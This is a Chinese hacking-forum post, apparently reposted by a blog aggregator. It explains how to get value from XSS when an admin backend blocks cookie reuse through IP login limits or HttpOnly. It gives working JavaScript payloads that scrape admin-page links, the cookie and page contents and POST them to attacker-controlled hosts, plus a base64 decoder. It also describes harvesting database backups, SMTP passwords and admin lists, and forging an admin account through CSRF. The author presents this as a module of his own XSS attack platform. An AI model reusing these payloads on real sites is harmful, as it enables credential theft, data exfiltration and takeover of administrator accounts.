XSS遇到后台登录限制或者HTTPONLY时

来源：互联网发布：nginx动静分离原理编辑：程序博客网时间：2024/06/06 04:09

http://www.hack80.com/thread-965-1-1.html

0x01 前言
      XSS确实是个好东西，往往能在我们没有头绪的时候带来一丝曙光，宛如拿站途中的一轮明月，又如饥饿时的一块小曲奇（cookie）~
      然而，我们却时常遇到形如限制登录，HTTPONLY等拦路虎，这时，很多机油可能觉得XSS就没什么用了。
如下：

0x02 XSS用途探索

其实即使如此，XSS还是能帮助我们得到不少信息。甚至管理员的密码！
如何获取呢？方法有两种：
1.获取当前页面的所有URL
2.获取当前页面的代码

这个用途，撸主最开始想到的是用来对付WEBSHELL箱子的。是的，我们知道，登录一个箱子后台之后，基本上是拿不下shell的，我们要的主要是数据

例如，当时有这么一个webshell站点，马场主发现被人XSS之后，限制了ip登陆，即使得到了cookie也登不进去

这时候，我们就可以通过XSS获取页面的内容，直接得到所有webshell（当然要写一个循环）。

0x03  XSS用途探索——获取URL
      不能光说不练不是，我们使用如下的js代码即可获取当前页面的所有URL：

a = document.getElementsByTagName("A");
var b = "";
for(i=0;i<a.length;i++)
{
b+=a[i].href;
b+="</br>";
}
postDATA="cookie="+escape(document.cookie)+"&location="+escape(window.location.href)+"&top="+escape(top.location.href)+"&urls="+escape(b);
url="http://xxxx.com/save.php";
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlHttp.send(postDATA);
}
window.onload = function(){
submitForm();
}

复制代码

为什么不用get？答：因为get有长度限制

例如，我们在某个后台插入了自己的js：

等管理员看的时候，就得到了所有的url，我们可以在下图看到，后台往往有一些链接地址，都是各种管理的：

之后我们需要辗转多次，来搜集一些敏感的链接，例如数据库备份，SMTP设置，管理员列表之类的

这些页面的作用：
1.数据库备份：没准能看到数据库或者备份的路径
2.SMTP设置：管理员邮箱，密码
3.管理员列表：有时候管理员密码会显示在此，即使不在，没准可以CSRF添加一个管理员

0x04 XSS用途探索——获取指定URL页面代码
得到了敏感路径之后呢，我们就可以利用如下的JS来获取特定的页面（当然，上一步在当前页面搜集不齐URL的时候，也可以使用这个JS到别的页面搜集）
关键代码如下：

function submitForm() {
var xmlHttp = createXmlHttp();
var htmlcode = getHtmlCode('http://xxxx.com/admin/asked/admin_data.asp?action=BackupData');
var html = encode64(htmlcode);
postDATA = "msg="+html;
url="http://aaaa.com/savePage.php";
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlHttp.send(postDATA);
}
window.onload = function(){
submitForm();
}

复制代码

为什么要base64？答：现将网页escape，然后再用base64传送，即能解决传送时候一些特殊编码问题，又能解决中文乱码问题

我们得到内容的将会如下图：

然后我们先用base64解码，再unescape：
JS代码如下：

function decode64(input) {
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
var base64test = /[^A-Za-z0-9\+\/\=]/g;
if (base64test.exec(input)) {
alert("There were invalid base64 characters in the input text.\n" +
"Valid base64 characters are A-Z, a-z, 0-9, '+', '/', and '='\n" +
"Expect errors in decoding.");
}
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i < input.length);
return unescape(output);
}

复制代码

最终能得到网页源代码，其中包含着敏感信息：

同样，我们也可以得到添加管理员的页面的代码：

然后可以构造一个CSRF了

0x05 总结
      即使cookie不能用，也不要小看xss的威力，撸主标题注明了，这是一篇“研究”文，意在抛砖引玉，广开大家思路，如有其他好思路可以给撸主留言，好机油一起讨论~~

     另外，这写个模块，撸主已经加到了自己用的XSS平台里~~效果图来一张：

114010qd97znttw3wzwdq8.jpg (15.12 KB, 下载次数: 0)

114014yicqve2fyfcciffy.jpg (77.12 KB, 下载次数: 0)

114344zq1mazu3h8uv0f39.jpg (45.49 KB, 下载次数: 0)

11434493ilw5j5zpc5slyl.jpg (16.72 KB, 下载次数: 0)

115007w77wmstw85za5m6g.jpg (27.91 KB, 下载次数: 0)

115117llltatyjv0mcggla.jpg (290.08 KB, 下载次数: 0)

115309srslsnwjqza5flne.jpg (88.76 KB, 下载次数: 0)

0 0